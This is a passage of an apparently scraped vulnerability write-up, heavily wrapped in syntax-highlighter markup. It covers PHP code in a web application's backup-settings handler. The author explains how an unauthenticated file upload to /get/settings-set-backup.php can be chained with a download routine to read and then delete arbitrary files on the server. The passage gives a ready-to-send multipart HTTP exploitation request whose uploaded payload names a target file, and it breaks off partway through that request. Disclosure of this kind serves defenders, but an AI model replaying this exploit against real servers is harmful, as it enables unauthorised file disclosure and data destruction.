class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ini_get<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-s\">&#8216;upload_tmp_dir&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-s\">&#8216;\\&#8217;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-3\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">file_get_contents<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-4\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">ob_end_clean<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-5\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Content-type: application\/download&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-6\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Content-Disposition: attachment; filename=&#8221;export.csv&#8221;&#8216;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-7\"><span 
class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Content-transfer-encoding: binary&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-8\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">header<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Content-Length: &#8216;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">filesize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-9\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">readfile<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-10\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">unlink<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc0266046815-11\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">unlink<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">filename<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc0266046815-12\"><span 
class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0014 seconds] -->  <\/p>\n<p>So this couldn&#8217;t be directly exploited because it actually views the contents of the path, that&#8217;s written in a file (idk what could be the purpose of this function), but I found another minor file upload vulnerability (no .php extensions) that helps exploiting this. In \/get\/settings-set-backup.php,<\/p>\n<p>Vulnerable code:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cc3597269406\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div 
class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> } else if ($_POST[&#8216;action&#8217;] == &#8216;upload&#8217; ) {    $viperpath = &#8216;\/control\/command\/backup\/upload\/&#8217;;    $send = &#8220;false&#8221;;    $vipperResult = &#8220;0&#8221;;      \/\/ kontrola existence nahravaneho souboru    if(empty($_FILES[&#8216;restore_file&#8217;][&#8216;tmp_name&#8217;]))      die(&#8216;{&#8220;success&#8221;:&#8221;false&#8221;,            &#8220;vipperResult&#8221;:&#8221;-3&#8243;,            &#8220;resultDesc&#8221;:&#8221;ER_FILE_NOT_FOUND&#8221;           }&#8217;);          \/\/ cesta k nahranemu souboru    $tmpName = realpath(dirname(__FILE__) . &#8216;\/..\/..\/tmp\/&#8217;).&#8217;\\restore_bkp_&#8217;.$_SESSION[&#8216;useruid&#8217;];        copy($_FILES[&#8216;restore_file&#8217;][&#8216;tmp_name&#8217;], $tmpName);<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-6\">6<\/div>\n<div 
class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc3597269406-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc3597269406-17\">17<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-1\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_POST<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#039;action&#039;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#039;upload&#039;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-2\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">viperpath<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#039;\/control\/command\/backup\/upload\/&#039;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-3\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">send<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;false&quot;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-4\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">vipperResult<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;0&quot;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-6\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ check that the uploaded file exists<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-7\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">empty<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_FILES<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#039;restore_file&#039;<\/span><span 
class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#039;tmp_name&#039;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">die<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#039;{&quot;success&quot;:&quot;false&quot;,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-9\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;vipperResult&quot;:&quot;-3&quot;,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-10\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;resultDesc&quot;:&quot;ER_FILE_NOT_FOUND&quot;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-11\"><span class=\"crayon-s\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }&#039;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-12\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-14\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-c\">\/\/ path to the uploaded file<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-15\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">tmpName<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">realpath<\/span><span 
class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">dirname<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">__FILE__<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#039;\/..\/..\/tmp\/&#039;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-s\">&#039;\\restore_bkp_&#039;<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_SESSION<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#039;useruid&#039;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc3597269406-16\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc3597269406-17\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-e\">copy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_FILES<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#039;restore_file&#039;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#039;tmp_name&#039;<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">tmpName<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>This requires no authentication and creates the file restore_bkp_ (the name ends there because $_SESSION[&#039;useruid&#039;] would be null) with whatever content we want, which here is the path of the file we want to disclose and consequently delete.<\/p>\n<p>Exploitation 
requests:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5ae0fedea1cc6903955316\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> POST \/get\/settings-set-backup.php HTTP\/1.1  Host: VULNERABLE_HOST:20394  Connection: close  Content-Length: 306  
Cache-Control: max-age=0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8  Origin: https:\/\/VULNERABLE_HOST:20394  Upgrade-Insecure-Requests: 1  User-Agent: Mozilla  Content-Type: multipart\/form-data; boundary=&#8212;-WebKitFormBoundary6rzvt7fRozJ1TlNT  Referer: https:\/\/VULNERABLE_HOST:20394\/  Accept-Encoding: gzip, deflate  Accept-Language: en-US,en;q=0.8    &#8212;&#8212;WebKitFormBoundary6rzvt7fRozJ1TlNT  Content-Disposition: form-data; name=&#8221;restore_file&#8221;; filename=&#8221;exploit.txt&#8221;  Content-Type: text\/plain    C:private.txt  &#8212;&#8212;WebKitFormBoundary6rzvt7fRozJ1TlNT  Content-Disposition: form-data; name=&#8221;action&#8221;    upload  &#8212;&#8212;WebKitFormBoundary6rzvt7fRozJ1TlNT&#8211;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-10\">10<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-5ae0fedea1cc6903955316-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5ae0fedea1cc6903955316-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5ae0fedea1cc6903955316-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">get<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">settings<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">backup<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">php 
<\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">VULNERABLE_HOST<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">20394<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-3\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">306<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-5\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">max<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">age<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-6\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span 
class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">image<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">webp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-7\"><span class=\"crayon-v\">Origin<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VULNERABLE_HOST:20394<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-8\"><span class=\"crayon-v\">Upgrade<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Insecure<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requests<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-9\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Mozilla<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-v\">multipart<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">boundary<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-e\">WebKitFormBoundary6rzvt7fRozJ1TlNT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-11\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">https<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/VULNERABLE_HOST:20394\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5ae0fedea1cc6903955316-12\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">deflate<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5ae0fedea1cc6903955316-13\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span 